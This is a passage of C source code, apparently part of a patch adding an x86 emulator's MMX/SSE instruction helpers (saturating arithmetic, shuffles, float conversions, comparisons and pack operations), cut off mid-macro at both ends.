FADDSB(a, b) satsb((int8_t)(a) + (int8_t)(b)) +#define FADDSW(a, b) satsw((int16_t)(a) + (int16_t)(b)) + +#define FSUB(a, b) ((a) - (b)) +#define FSUBUB(a, b) satub((a) - (b)) +#define FSUBUW(a, b) satuw((a) - (b)) +#define FSUBSB(a, b) satsb((int8_t)(a) - (int8_t)(b)) +#define FSUBSW(a, b) satsw((int16_t)(a) - (int16_t)(b)) +#define FMINUB(a, b) ((a) < (b)) ? (a) : (b) +#define FMINSW(a, b) ((int16_t)(a) < (int16_t)(b)) ? (a) : (b) +#define FMAXUB(a, b) ((a) > (b)) ? (a) : (b) +#define FMAXSW(a, b) ((int16_t)(a) > (int16_t)(b)) ? (a) : (b) + +#define FAND(a, b) ((a) & (b)) +#define FANDN(a, b) ((~(a)) & (b)) +#define FOR(a, b) ((a) | (b)) +#define FXOR(a, b) ((a) ^ (b)) + +#define FCMPGTB(a, b) ((int8_t)(a) > (int8_t)(b) ? -1 : 0) +#define FCMPGTW(a, b) ((int16_t)(a) > (int16_t)(b) ? -1 : 0) +#define FCMPGTL(a, b) ((int32_t)(a) > (int32_t)(b) ? -1 : 0) +#define FCMPEQ(a, b) ((a) == (b) ? -1 : 0) + +#define FMULLW(a, b) ((int64_t)(a) * (b)) +#define FMULHRW(a, b) (((int16_t)(a) * (int16_t)(b) + 0x8000) >> 16) +#define FMULHUW(a, b) ((int64_t)(a) * (b) >> 16) +#define FMULHW(a, b) ((int16_t)(a) * (int16_t)(b) >> 16) + +#define FAVG(a, b) (((a) + (b) + 1) >> 1) +#endif + +SSE_HELPER_B(helper_paddb, FADD) +SSE_HELPER_W(helper_paddw, FADD) +SSE_HELPER_L(helper_paddl, FADD) +SSE_HELPER_Q(helper_paddq, FADD) + +SSE_HELPER_B(helper_psubb, FSUB) +SSE_HELPER_W(helper_psubw, FSUB) +SSE_HELPER_L(helper_psubl, FSUB) +SSE_HELPER_Q(helper_psubq, FSUB) + +SSE_HELPER_B(helper_paddusb, FADDUB) +SSE_HELPER_B(helper_paddsb, FADDSB) +SSE_HELPER_B(helper_psubusb, FSUBUB) +SSE_HELPER_B(helper_psubsb, FSUBSB) + +SSE_HELPER_W(helper_paddusw, FADDUW) +SSE_HELPER_W(helper_paddsw, FADDSW) +SSE_HELPER_W(helper_psubusw, FSUBUW) +SSE_HELPER_W(helper_psubsw, FSUBSW) + +SSE_HELPER_B(helper_pminub, FMINUB) +SSE_HELPER_B(helper_pmaxub, FMAXUB) + +SSE_HELPER_W(helper_pminsw, FMINSW) +SSE_HELPER_W(helper_pmaxsw, FMAXSW) + +SSE_HELPER_Q(helper_pand, FAND) +SSE_HELPER_Q(helper_pandn, FANDN) +SSE_HELPER_Q(helper_por, FOR) +SSE_HELPER_Q(helper_pxor, FXOR) + +SSE_HELPER_B(helper_pcmpgtb, FCMPGTB) +SSE_HELPER_W(helper_pcmpgtw, FCMPGTW) +SSE_HELPER_L(helper_pcmpgtl, FCMPGTL) + +SSE_HELPER_B(helper_pcmpeqb, FCMPEQ) +SSE_HELPER_W(helper_pcmpeqw, FCMPEQ) +SSE_HELPER_L(helper_pcmpeql, FCMPEQ) + +SSE_HELPER_W(helper_pmullw, FMULLW) +#if SHIFT == 0 +SSE_HELPER_W(helper_pmulhrw, FMULHRW) +#endif +SSE_HELPER_W(helper_pmulhuw, FMULHUW) +SSE_HELPER_W(helper_pmulhw, FMULHW) + +SSE_HELPER_B(helper_pavgb, FAVG) +SSE_HELPER_W(helper_pavgw, FAVG) + +void glue(helper_pmuludq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->Q(0) = (uint64_t)s->L(0) * (uint64_t)d->L(0); +#if SHIFT == 1 + d->Q(1) = (uint64_t)s->L(2) * (uint64_t)d->L(2); +#endif +} + +void glue(helper_pmaddwd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + + for (i = 0; i < (2 << SHIFT); i++) { + d->L(i) = (int16_t)s->W(2 * i) * (int16_t)d->W(2 * i) + + (int16_t)s->W(2 * i + 1) * (int16_t)d->W(2 * i + 1); + } +} + +#if SHIFT == 0 +static inline int abs1(int a) +{ + if (a < 0 && a != 0x80000000) { + return -a; + } else { + return a; + } +} +#endif +void glue(helper_psadbw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + unsigned int val; + + val = 0; + val += abs1(d->B(0) - s->B(0)); + val += abs1(d->B(1) - s->B(1)); + val += abs1(d->B(2) - s->B(2)); + val += abs1(d->B(3) - s->B(3)); + val += abs1(d->B(4) - s->B(4)); + val += abs1(d->B(5) - s->B(5)); + val += abs1(d->B(6) - s->B(6)); + val += abs1(d->B(7) - s->B(7)); + d->Q(0) = val; +#if SHIFT == 1 + val = 0; + val += abs1(d->B(8) - s->B(8)); + val += abs1(d->B(9) - s->B(9)); + val += abs1(d->B(10) - s->B(10)); + val += abs1(d->B(11) - s->B(11)); + val += abs1(d->B(12) - s->B(12)); + val += abs1(d->B(13) - s->B(13)); + val += abs1(d->B(14) - s->B(14)); + val += abs1(d->B(15) - s->B(15)); + d->Q(1) = val; +#endif +} + +void glue(helper_maskmov, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + target_ulong a0) +{ + int i; + + for (i = 0; i < (8 << SHIFT); i++) { + if (s->B(i) & 0x80) { + cpu_stb_data(env, a0 + i, d->B(i)); + } + } +} + +void glue(helper_movl_mm_T0, SUFFIX)(Reg *d, uint32_t val) +{ + d->L(0) = val; + d->L(1) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif +} + +#ifdef TARGET_X86_64 +void glue(helper_movq_mm_T0, SUFFIX)(Reg *d, uint64_t val) +{ + d->Q(0) = val; +#if SHIFT == 1 + d->Q(1) = 0; +#endif +} +#endif + +#if SHIFT == 0 +void glue(helper_pshufw, SUFFIX)(Reg *d, Reg *s, int order) +{ + Reg r; + + r.W(0) = s->W(order & 3); + r.W(1) = s->W((order >> 2) & 3); + r.W(2) = s->W((order >> 4) & 3); + r.W(3) = s->W((order >> 6) & 3); + *d = r; +} +#else +void helper_shufps(Reg *d, Reg *s, int order) +{ + Reg r; + + r.L(0) = d->L(order & 3); + r.L(1) = d->L((order >> 2) & 3); + r.L(2) = s->L((order >> 4) & 3); + r.L(3) = s->L((order >> 6) & 3); + *d = r; +} + +void helper_shufpd(Reg *d, Reg *s, int order) +{ + Reg r; + + r.Q(0) = d->Q(order & 1); + r.Q(1) = s->Q((order >> 1) & 1); + *d = r; +} + +void glue(helper_pshufd, SUFFIX)(Reg *d, Reg *s, int order) +{ + Reg r; + + r.L(0) = s->L(order & 3); + r.L(1) = s->L((order >> 2) & 3); + r.L(2) = s->L((order >> 4) & 3); + r.L(3) = s->L((order >> 6) & 3); + *d = r; +} + +void glue(helper_pshuflw, SUFFIX)(Reg *d, Reg *s, int order) +{ + Reg r; + + r.W(0) = s->W(order & 3); + r.W(1) = s->W((order >> 2) & 3); + r.W(2) = s->W((order >> 4) & 3); + r.W(3) = s->W((order >> 6) & 3); + r.Q(1) = s->Q(1); + *d = r; +} + +void glue(helper_pshufhw, SUFFIX)(Reg *d, Reg *s, int order) +{ + Reg r; + + r.Q(0) = s->Q(0); + r.W(4) = s->W(4 + (order & 3)); + r.W(5) = s->W(4 + ((order >> 2) & 3)); + r.W(6) = s->W(4 + ((order >> 4) & 3)); + r.W(7) = s->W(4 + ((order >> 6) & 3)); + *d = r; +} +#endif + +#if SHIFT == 1 +/* FPU ops */ +/* XXX: not accurate */ + +#define SSE_HELPER_S(name, F) \ + void helper_ ## name ## ps(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_S(0) = F(32, d->XMM_S(0), s->XMM_S(0)); \ + d->XMM_S(1) = F(32, d->XMM_S(1), s->XMM_S(1)); \ + d->XMM_S(2) = F(32, d->XMM_S(2), s->XMM_S(2)); \ + d->XMM_S(3) = F(32, d->XMM_S(3), s->XMM_S(3)); \ + } \ + \ + void helper_ ## name ## ss(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_S(0) = F(32, d->XMM_S(0), s->XMM_S(0)); \ + } \ + \ + void helper_ ## name ## pd(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_D(0) = F(64, d->XMM_D(0), s->XMM_D(0)); \ + d->XMM_D(1) = F(64, d->XMM_D(1), s->XMM_D(1)); \ + } \ + \ + void helper_ ## name ## sd(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_D(0) = F(64, d->XMM_D(0), s->XMM_D(0)); \ + } + +#define FPU_ADD(size, a, b) float ## size ## _add(a, b, &env->sse_status) +#define FPU_SUB(size, a, b) float ## size ## _sub(a, b, &env->sse_status) +#define FPU_MUL(size, a, b) float ## size ## _mul(a, b, &env->sse_status) +#define FPU_DIV(size, a, b) float ## size ## _div(a, b, &env->sse_status) +#define FPU_SQRT(size, a, b) float ## size ## _sqrt(b, &env->sse_status) + +/* Note that the choice of comparison op here is important to get the + * special cases right: for min and max Intel specifies that (-0,0), + * (NaN, anything) and (anything, NaN) return the second argument. + */ +#define FPU_MIN(size, a, b) \ + (float ## size ## _lt(a, b, &env->sse_status) ? (a) : (b)) +#define FPU_MAX(size, a, b) \ + (float ## size ## _lt(b, a, &env->sse_status) ? (a) : (b)) + +SSE_HELPER_S(add, FPU_ADD) +SSE_HELPER_S(sub, FPU_SUB) +SSE_HELPER_S(mul, FPU_MUL) +SSE_HELPER_S(div, FPU_DIV) +SSE_HELPER_S(min, FPU_MIN) +SSE_HELPER_S(max, FPU_MAX) +SSE_HELPER_S(sqrt, FPU_SQRT) + + +/* float to float conversions */ +void helper_cvtps2pd(CPUX86State *env, Reg *d, Reg *s) +{ + float32 s0, s1; + + s0 = s->XMM_S(0); + s1 = s->XMM_S(1); + d->XMM_D(0) = float32_to_float64(s0, &env->sse_status); + d->XMM_D(1) = float32_to_float64(s1, &env->sse_status); +} + +void helper_cvtpd2ps(CPUX86State *env, Reg *d, Reg *s) +{ + d->XMM_S(0) = float64_to_float32(s->XMM_D(0), &env->sse_status); + d->XMM_S(1) = float64_to_float32(s->XMM_D(1), &env->sse_status); + d->Q(1) = 0; +} + +void helper_cvtss2sd(CPUX86State *env, Reg *d, Reg *s) +{ + d->XMM_D(0) = float32_to_float64(s->XMM_S(0), &env->sse_status); +} + +void helper_cvtsd2ss(CPUX86State *env, Reg *d, Reg *s) +{ + d->XMM_S(0) = float64_to_float32(s->XMM_D(0), &env->sse_status); +} + +/* integer to float */ +void helper_cvtdq2ps(CPUX86State *env, Reg *d, Reg *s) +{ + d->XMM_S(0) = int32_to_float32(s->XMM_L(0), &env->sse_status); + d->XMM_S(1) = int32_to_float32(s->XMM_L(1), &env->sse_status); + d->XMM_S(2) = int32_to_float32(s->XMM_L(2), &env->sse_status); + d->XMM_S(3) = int32_to_float32(s->XMM_L(3), &env->sse_status); +} + +void helper_cvtdq2pd(CPUX86State *env, Reg *d, Reg *s) +{ + int32_t l0, l1; + + l0 = (int32_t)s->XMM_L(0); + l1 = (int32_t)s->XMM_L(1); + d->XMM_D(0) = int32_to_float64(l0, &env->sse_status); + d->XMM_D(1) = int32_to_float64(l1, &env->sse_status); +} + +void helper_cvtpi2ps(CPUX86State *env, XMMReg *d, MMXReg *s) +{ + d->XMM_S(0) = int32_to_float32(s->MMX_L(0), &env->sse_status); + d->XMM_S(1) = int32_to_float32(s->MMX_L(1), &env->sse_status); +} + +void helper_cvtpi2pd(CPUX86State *env, XMMReg *d, MMXReg *s) +{ + d->XMM_D(0) = int32_to_float64(s->MMX_L(0), &env->sse_status); + d->XMM_D(1) = int32_to_float64(s->MMX_L(1), &env->sse_status); +} + +void helper_cvtsi2ss(CPUX86State *env, XMMReg *d, uint32_t val) +{ + d->XMM_S(0) = int32_to_float32(val, &env->sse_status); +} + +void helper_cvtsi2sd(CPUX86State *env, XMMReg *d, uint32_t val) +{ + d->XMM_D(0) = int32_to_float64(val, &env->sse_status); +} + +#ifdef TARGET_X86_64 +void helper_cvtsq2ss(CPUX86State *env, XMMReg *d, uint64_t val) +{ + d->XMM_S(0) = int64_to_float32(val, &env->sse_status); +} + +void helper_cvtsq2sd(CPUX86State *env, XMMReg *d, uint64_t val) +{ + d->XMM_D(0) = int64_to_float64(val, &env->sse_status); +} +#endif + +/* float to integer */ + +/* + * x86 mandates that we return the indefinite integer value for the result + * of any float-to-integer conversion that raises the 'invalid' exception. + * Wrap the softfloat functions to get this behaviour. + */ +#define WRAP_FLOATCONV(RETTYPE, FN, FLOATTYPE, INDEFVALUE) \ + static inline RETTYPE x86_##FN(FLOATTYPE a, float_status *s) \ + { \ + int oldflags, newflags; \ + RETTYPE r; \ + \ + oldflags = get_float_exception_flags(s); \ + set_float_exception_flags(0, s); \ + r = FN(a, s); \ + newflags = get_float_exception_flags(s); \ + if (newflags & float_flag_invalid) { \ + r = INDEFVALUE; \ + } \ + set_float_exception_flags(newflags | oldflags, s); \ + return r; \ + } + +WRAP_FLOATCONV(int32_t, float32_to_int32, float32, INT32_MIN) +WRAP_FLOATCONV(int32_t, float32_to_int32_round_to_zero, float32, INT32_MIN) +WRAP_FLOATCONV(int32_t, float64_to_int32, float64, INT32_MIN) +WRAP_FLOATCONV(int32_t, float64_to_int32_round_to_zero, float64, INT32_MIN) +WRAP_FLOATCONV(int64_t, float32_to_int64, float32, INT64_MIN) +WRAP_FLOATCONV(int64_t, float32_to_int64_round_to_zero, float32, INT64_MIN) +WRAP_FLOATCONV(int64_t, float64_to_int64, float64, INT64_MIN) +WRAP_FLOATCONV(int64_t, float64_to_int64_round_to_zero, float64, INT64_MIN) + +void helper_cvtps2dq(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_L(0) = x86_float32_to_int32(s->XMM_S(0), &env->sse_status); + d->XMM_L(1) = x86_float32_to_int32(s->XMM_S(1), &env->sse_status); + d->XMM_L(2) = x86_float32_to_int32(s->XMM_S(2), &env->sse_status); + d->XMM_L(3) = x86_float32_to_int32(s->XMM_S(3), &env->sse_status); +} + +void helper_cvtpd2dq(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_L(0) = x86_float64_to_int32(s->XMM_D(0), &env->sse_status); + d->XMM_L(1) = x86_float64_to_int32(s->XMM_D(1), &env->sse_status); + d->XMM_Q(1) = 0; +} + +void helper_cvtps2pi(CPUX86State *env, MMXReg *d, XMMReg *s) +{ + d->MMX_L(0) = x86_float32_to_int32(s->XMM_S(0), &env->sse_status); + d->MMX_L(1) = x86_float32_to_int32(s->XMM_S(1), &env->sse_status); +} + +void helper_cvtpd2pi(CPUX86State *env, MMXReg *d, XMMReg *s) +{ + d->MMX_L(0) = x86_float64_to_int32(s->XMM_D(0), &env->sse_status); + d->MMX_L(1) = x86_float64_to_int32(s->XMM_D(1), &env->sse_status); +} + +int32_t helper_cvtss2si(CPUX86State *env, XMMReg *s) +{ + return x86_float32_to_int32(s->XMM_S(0), &env->sse_status); +} + +int32_t helper_cvtsd2si(CPUX86State *env, XMMReg *s) +{ + return x86_float64_to_int32(s->XMM_D(0), &env->sse_status); +} + +#ifdef TARGET_X86_64 +int64_t helper_cvtss2sq(CPUX86State *env, XMMReg *s) +{ + return x86_float32_to_int64(s->XMM_S(0), &env->sse_status); +} + +int64_t helper_cvtsd2sq(CPUX86State *env, XMMReg *s) +{ + return x86_float64_to_int64(s->XMM_D(0), &env->sse_status); +} +#endif + +/* float to integer truncated */ +void helper_cvttps2dq(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_L(0) = x86_float32_to_int32_round_to_zero(s->XMM_S(0), &env->sse_status); + d->XMM_L(1) = x86_float32_to_int32_round_to_zero(s->XMM_S(1), &env->sse_status); + d->XMM_L(2) = x86_float32_to_int32_round_to_zero(s->XMM_S(2), &env->sse_status); + d->XMM_L(3) = x86_float32_to_int32_round_to_zero(s->XMM_S(3), &env->sse_status); +} + +void helper_cvttpd2dq(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_L(0) = x86_float64_to_int32_round_to_zero(s->XMM_D(0), &env->sse_status); + d->XMM_L(1) = x86_float64_to_int32_round_to_zero(s->XMM_D(1), &env->sse_status); + d->XMM_Q(1) = 0; +} + +void helper_cvttps2pi(CPUX86State *env, MMXReg *d, XMMReg *s) +{ + d->MMX_L(0) = x86_float32_to_int32_round_to_zero(s->XMM_S(0), &env->sse_status); + d->MMX_L(1) = x86_float32_to_int32_round_to_zero(s->XMM_S(1), &env->sse_status); +} + +void helper_cvttpd2pi(CPUX86State *env, MMXReg *d, XMMReg *s) +{ + d->MMX_L(0) = x86_float64_to_int32_round_to_zero(s->XMM_D(0), &env->sse_status); + d->MMX_L(1) = x86_float64_to_int32_round_to_zero(s->XMM_D(1), &env->sse_status); +} + +int32_t helper_cvttss2si(CPUX86State *env, XMMReg *s) +{ + return x86_float32_to_int32_round_to_zero(s->XMM_S(0), &env->sse_status); +} + +int32_t helper_cvttsd2si(CPUX86State *env, XMMReg *s) +{ + return x86_float64_to_int32_round_to_zero(s->XMM_D(0), &env->sse_status); +} + +#ifdef TARGET_X86_64 +int64_t helper_cvttss2sq(CPUX86State *env, XMMReg *s) +{ + return x86_float32_to_int64_round_to_zero(s->XMM_S(0), &env->sse_status); +} + +int64_t helper_cvttsd2sq(CPUX86State *env, XMMReg *s) +{ + return x86_float64_to_int64_round_to_zero(s->XMM_D(0), &env->sse_status); +} +#endif + +void helper_rsqrtps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_div(float32_one, + float32_sqrt(s->XMM_S(0), &env->sse_status), + &env->sse_status); + d->XMM_S(1) = float32_div(float32_one, + float32_sqrt(s->XMM_S(1), &env->sse_status), + &env->sse_status); + d->XMM_S(2) = float32_div(float32_one, + float32_sqrt(s->XMM_S(2), &env->sse_status), + &env->sse_status); + d->XMM_S(3) = float32_div(float32_one, + float32_sqrt(s->XMM_S(3), &env->sse_status), + &env->sse_status); +} + +void helper_rsqrtss(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_div(float32_one, + float32_sqrt(s->XMM_S(0), &env->sse_status), + &env->sse_status); +} + +void helper_rcpps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_div(float32_one, s->XMM_S(0), &env->sse_status); + d->XMM_S(1) = float32_div(float32_one, s->XMM_S(1), &env->sse_status); + d->XMM_S(2) = float32_div(float32_one, s->XMM_S(2), &env->sse_status); + d->XMM_S(3) = float32_div(float32_one, s->XMM_S(3), &env->sse_status); +} + +void helper_rcpss(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_div(float32_one, s->XMM_S(0), &env->sse_status); +} + +static inline uint64_t helper_extrq(uint64_t src, int shift, int len) +{ + uint64_t mask; + + if (len == 0) { + mask = ~0LL; + } else { + mask = (1ULL << (len & 0x3f)) - 1; + } + return (src >> (shift & 0x3f)) & mask; +} + +void helper_extrq_r(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_Q(0) = helper_extrq(d->XMM_Q(0), s->XMM_B(1), s->XMM_B(0)); +} + +void helper_extrq_i(CPUX86State *env, XMMReg *d, int index, int length) +{ + d->XMM_Q(0) = helper_extrq(d->XMM_Q(0), index, length); +} + +static inline uint64_t helper_insertq(uint64_t src, int shift, int len) +{ + uint64_t mask; + + if (len == 0) { + mask = ~0ULL; + } else { + mask = (1ULL << (len & 0x3f)) - 1; + } + return (src & ~(mask << (shift & 0x3f))) | ((src & mask) << (shift & 0x3f)); +} + +void helper_insertq_r(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_Q(0) = helper_insertq(s->XMM_Q(0), s->XMM_B(9), s->XMM_B(8)); +} + +void helper_insertq_i(CPUX86State *env, XMMReg *d, int index, int length) +{ + d->XMM_Q(0) = helper_insertq(d->XMM_Q(0), index, length); +} + +void helper_haddps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + XMMReg r; + + r.XMM_S(0) = float32_add(d->XMM_S(0), d->XMM_S(1), &env->sse_status); + r.XMM_S(1) = float32_add(d->XMM_S(2), d->XMM_S(3), &env->sse_status); + r.XMM_S(2) = float32_add(s->XMM_S(0), s->XMM_S(1), &env->sse_status); + r.XMM_S(3) = float32_add(s->XMM_S(2), s->XMM_S(3), &env->sse_status); + *d = r; +} + +void helper_haddpd(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + XMMReg r; + + r.XMM_D(0) = float64_add(d->XMM_D(0), d->XMM_D(1), &env->sse_status); + r.XMM_D(1) = float64_add(s->XMM_D(0), s->XMM_D(1), &env->sse_status); + *d = r; +} + +void helper_hsubps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + XMMReg r; + + r.XMM_S(0) = float32_sub(d->XMM_S(0), d->XMM_S(1), &env->sse_status); + r.XMM_S(1) = float32_sub(d->XMM_S(2), d->XMM_S(3), &env->sse_status); + r.XMM_S(2) = float32_sub(s->XMM_S(0), s->XMM_S(1), &env->sse_status); + r.XMM_S(3) = float32_sub(s->XMM_S(2), s->XMM_S(3), &env->sse_status); + *d = r; +} + +void helper_hsubpd(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + XMMReg r; + + r.XMM_D(0) = float64_sub(d->XMM_D(0), d->XMM_D(1), &env->sse_status); + r.XMM_D(1) = float64_sub(s->XMM_D(0), s->XMM_D(1), &env->sse_status); + *d = r; +} + +void helper_addsubps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_sub(d->XMM_S(0), s->XMM_S(0), &env->sse_status); + d->XMM_S(1) = float32_add(d->XMM_S(1), s->XMM_S(1), &env->sse_status); + d->XMM_S(2) = float32_sub(d->XMM_S(2), s->XMM_S(2), &env->sse_status); + d->XMM_S(3) = float32_add(d->XMM_S(3), s->XMM_S(3), &env->sse_status); +} + +void helper_addsubpd(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_D(0) = float64_sub(d->XMM_D(0), s->XMM_D(0), &env->sse_status); + d->XMM_D(1) = float64_add(d->XMM_D(1), s->XMM_D(1), &env->sse_status); +} + +/* XXX: unordered */ +#define SSE_HELPER_CMP(name, F) \ + void helper_ ## name ## ps(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_L(0) = F(32, d->XMM_S(0), s->XMM_S(0)); \ + d->XMM_L(1) = F(32, d->XMM_S(1), s->XMM_S(1)); \ + d->XMM_L(2) = F(32, d->XMM_S(2), s->XMM_S(2)); \ + d->XMM_L(3) = F(32, d->XMM_S(3), s->XMM_S(3)); \ + } \ + \ + void helper_ ## name ## ss(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_L(0) = F(32, d->XMM_S(0), s->XMM_S(0)); \ + } \ + \ + void helper_ ## name ## pd(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_Q(0) = F(64, d->XMM_D(0), s->XMM_D(0)); \ + d->XMM_Q(1) = F(64, d->XMM_D(1), s->XMM_D(1)); \ + } \ + \ + void helper_ ## name ## sd(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_Q(0) = F(64, d->XMM_D(0), s->XMM_D(0)); \ + } + +#define FPU_CMPEQ(size, a, b) \ + (float ## size ## _eq_quiet(a, b, &env->sse_status) ? -1 : 0) +#define FPU_CMPLT(size, a, b) \ + (float ## size ## _lt(a, b, &env->sse_status) ? -1 : 0) +#define FPU_CMPLE(size, a, b) \ + (float ## size ## _le(a, b, &env->sse_status) ? -1 : 0) +#define FPU_CMPUNORD(size, a, b) \ + (float ## size ## _unordered_quiet(a, b, &env->sse_status) ? -1 : 0) +#define FPU_CMPNEQ(size, a, b) \ + (float ## size ## _eq_quiet(a, b, &env->sse_status) ? 0 : -1) +#define FPU_CMPNLT(size, a, b) \ + (float ## size ## _lt(a, b, &env->sse_status) ? 0 : -1) +#define FPU_CMPNLE(size, a, b) \ + (float ## size ## _le(a, b, &env->sse_status) ? 0 : -1) +#define FPU_CMPORD(size, a, b) \ + (float ## size ## _unordered_quiet(a, b, &env->sse_status) ? 0 : -1) + +SSE_HELPER_CMP(cmpeq, FPU_CMPEQ) +SSE_HELPER_CMP(cmplt, FPU_CMPLT) +SSE_HELPER_CMP(cmple, FPU_CMPLE) +SSE_HELPER_CMP(cmpunord, FPU_CMPUNORD) +SSE_HELPER_CMP(cmpneq, FPU_CMPNEQ) +SSE_HELPER_CMP(cmpnlt, FPU_CMPNLT) +SSE_HELPER_CMP(cmpnle, FPU_CMPNLE) +SSE_HELPER_CMP(cmpord, FPU_CMPORD) + +static const int comis_eflags[4] = {CC_C, CC_Z, 0, CC_Z | CC_P | CC_C}; + +void helper_ucomiss(CPUX86State *env, Reg *d, Reg *s) +{ + int ret; + float32 s0, s1; + + s0 = d->XMM_S(0); + s1 = s->XMM_S(0); + ret = float32_compare_quiet(s0, s1, &env->sse_status); + CC_SRC = comis_eflags[ret + 1]; +} + +void helper_comiss(CPUX86State *env, Reg *d, Reg *s) +{ + int ret; + float32 s0, s1; + + s0 = d->XMM_S(0); + s1 = s->XMM_S(0); + ret = float32_compare(s0, s1, &env->sse_status); + CC_SRC = comis_eflags[ret + 1]; +} + +void helper_ucomisd(CPUX86State *env, Reg *d, Reg *s) +{ + int ret; + float64 d0, d1; + + d0 = d->XMM_D(0); + d1 = s->XMM_D(0); + ret = float64_compare_quiet(d0, d1, &env->sse_status); + CC_SRC = comis_eflags[ret + 1]; +} + +void helper_comisd(CPUX86State *env, Reg *d, Reg *s) +{ + int ret; + float64 d0, d1; + + d0 = d->XMM_D(0); + d1 = s->XMM_D(0); + ret = float64_compare(d0, d1, &env->sse_status); + CC_SRC = comis_eflags[ret + 1]; +} + +uint32_t helper_movmskps(CPUX86State *env, Reg *s) +{ + int b0, b1, b2, b3; + + b0 = s->XMM_L(0) >> 31; + b1 = s->XMM_L(1) >> 31; + b2 = s->XMM_L(2) >> 31; + b3 = s->XMM_L(3) >> 31; + return b0 | (b1 << 1) | (b2 << 2) | (b3 << 3); +} + +uint32_t helper_movmskpd(CPUX86State *env, Reg *s) +{ + int b0, b1; + + b0 = s->XMM_L(1) >> 31; + b1 = s->XMM_L(3) >> 31; + return b0 | (b1 << 1); +} + +#endif + +uint32_t glue(helper_pmovmskb, SUFFIX)(CPUX86State *env, Reg *s) +{ + uint32_t val; + + val = 0; + val |= (s->B(0) >> 7); + val |= (s->B(1) >> 6) & 0x02; + val |= (s->B(2) >> 5) & 0x04; + val |= (s->B(3) >> 4) & 0x08; + val |= (s->B(4) >> 3) & 0x10; + val |= (s->B(5) >> 2) & 0x20; + val |= (s->B(6) >> 1) & 0x40; + val |= (s->B(7)) & 0x80; +#if SHIFT == 1 + val |= (s->B(8) << 1) & 0x0100; + val |= (s->B(9) << 2) & 0x0200; + val |= (s->B(10) << 3) & 0x0400; + val |= (s->B(11) << 4) & 0x0800; + val |= (s->B(12) << 5) & 0x1000; + val |= (s->B(13) << 6) & 0x2000; + val |= (s->B(14) << 7) & 0x4000; + val |= (s->B(15) << 8) & 0x8000; +#endif + return val; +} + +void glue(helper_packsswb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + Reg r; + + r.B(0) = satsb((int16_t)d->W(0)); + r.B(1) = satsb((int16_t)d->W(1)); + r.B(2) = satsb((int16_t)d->W(2)); + r.B(3) = satsb((int16_t)d->W(3)); +#if SHIFT == 1 + r.B(4) = satsb((int16_t)d->W(4)); + r.B(5) = satsb((int16_t)d->W(5)); + r.B(6) = satsb((int16_t)d->W(6)); + r.B(7) = satsb((int16_t)d->W(7)); +#endif + r.B((4 << SHIFT) + 0) = satsb((int16_t)s->W(0)); + r.B((4 << SHIFT) + 1) = satsb((int16_t)s->W(1)); + r.B((4 << SHIFT) + 2) = satsb((int16_t)s->W(2)); + r.B((4 << SHIFT) + 3) = satsb((int16_t)s->W(3)); +#if SHIFT == 1 + r.B(12) = satsb((int16_t)s->W(4)); + r.B(13) = satsb((int16_t)s->W(5)); + r.B(14) = satsb((int16_t)s->W(6)); + r.B(15) = satsb((int16_t)s->W(7)); +#endif + *d = r; +} + +void glue(helper_packuswb, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + Reg r; + + r.B(0) = satub((int16_t)d->W(0)); + r.B(1) = satub((int16_t)d->W(1)); + r.B(2) = satub((int16_t)d->W(2)); + r.B(3) = satub((int16_t)d->W(3)); +#if SHIFT == 1 + r.B(4) = satub((int16_t)d->W(4)); + r.B(5) = satub((int16_t)d->W(5)); + r.B(6) = satub((int16_t)d->W(6)); + r.B(7) = satub((int16_t)d->W(7)); +#endif + r.B((4 << SHIFT) + 0) = satub((int16_t)s->W(0)); + r.B((4 << SHIFT) + 1) = satub((int16_t)s->W(1)); + r.B((4 << SHIFT) + 2) = satub((int16_t)s->W(2)); + r.B((4 << SHIFT) + 3) = satub((int16_t)s->W(3)); +#if SHIFT == 1 + r.B(12) = satub((int16_t)s->W(4)); + r.B(13) = satub((int16_t)s->W(5)); + r.B(14) = satub((int16_t)s->W(6)); + r.B(15) = satub((int16_t)s->W(7)); +#endif + *d = r; +} + +void glue(helper_packssdw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + Reg r; + + r.W(0) = satsw(d->L(0)); + r.W(1) = satsw(d->L(1)); +#if SHIFT == 1 + r.W(2) = satsw(d->L(2)); + r.W(3) = satsw(d->L(3)); +#endif + r.W((2 << SHIFT) + 0) = satsw(s->L(0)); + r.W((2 << SHIFT) + 1) = satsw(s->L(1)); +#if SHIFT == 1 + r.W(6) = satsw(s->L(2)); + r.W(7) = satsw(s->L(3)); +#endif + *d = r; +} + +#define UNPCK_OP(base_name, base) \ + \ + void glue(helper_punpck ## base_name ## bw, 